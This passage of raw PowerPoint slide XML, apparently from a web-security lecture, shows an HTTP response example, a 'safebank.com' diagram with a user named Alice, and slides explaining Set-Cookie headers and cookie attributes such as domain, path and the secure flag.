        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>RESPONSE:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP/1.0 200</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED3571D3-F056-F240-94EC-C2E6F712FBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7414478" y="4415435"/>
            <a:ext cx="1589441" cy="2090736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123C9F70-195A-5C4B-9CF8-F8A583412A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165337" y="4842020"/>
            <a:ext cx="929294" cy="1731915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3290E6F6-876A-8E4F-94A5-F217FEF01E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295524" y="4414520"/>
            <a:ext cx="774700" cy="320601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8B300D-F4C1-C040-84AF-CDA0934FFC97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142999" y="4004355"/>
            <a:ext cx="1132840" cy="130810"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1132839" h="130810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1132731" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132731" y="130764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="130764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC816D8-718D-614E-8FB9-549261075B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190624" y="3966946"/>
            <a:ext cx="1917700" cy="177800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>safebank.com/account.html</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51CE9646-3077-8946-9E58-DD7B6D6C1F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938611" y="3828436"/>
            <a:ext cx="2414189" cy="482600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2362200" h="482600">
                <a:moveTo>
                  <a:pt x="0" y="80434"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6320" y="49126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23558" y="23558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49126" y="6320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80434" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2281765" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2326390" y="13514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2356077" y="49653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362199" y="80434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362199" y="402165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2355879" y="433474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2338641" y="459041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2313074" y="476279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2281765" y="482599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80434" y="482599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49126" y="476279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23558" y="459041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6320" y="433474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="402165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="80434"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289594932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CCAC4F-C84F-1C4D-81B0-7EEE7DE17BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48FB4DFC-203C-854F-99FE-40D0AADA1854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>For the first time when a browser connects to a web server, the server includes in the response a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Set-Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Each cookie is just a name-value pair</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28654285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CCAC4F-C84F-1C4D-81B0-7EEE7DE17BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48FB4DFC-203C-854F-99FE-40D0AADA1854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Examples: Which cookie to send?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14A0CFA2-F641-8C45-8B9E-51FECA52BBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944562" y="2274887"/>
            <a:ext cx="3768725" cy="2227853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26034" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>u1</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>domain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>path </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>non-secure</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8E792D1-6013-7643-8D1A-208BE4BF5507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2274887"/>
            <a:ext cx="3000375" cy="2227853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26034" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
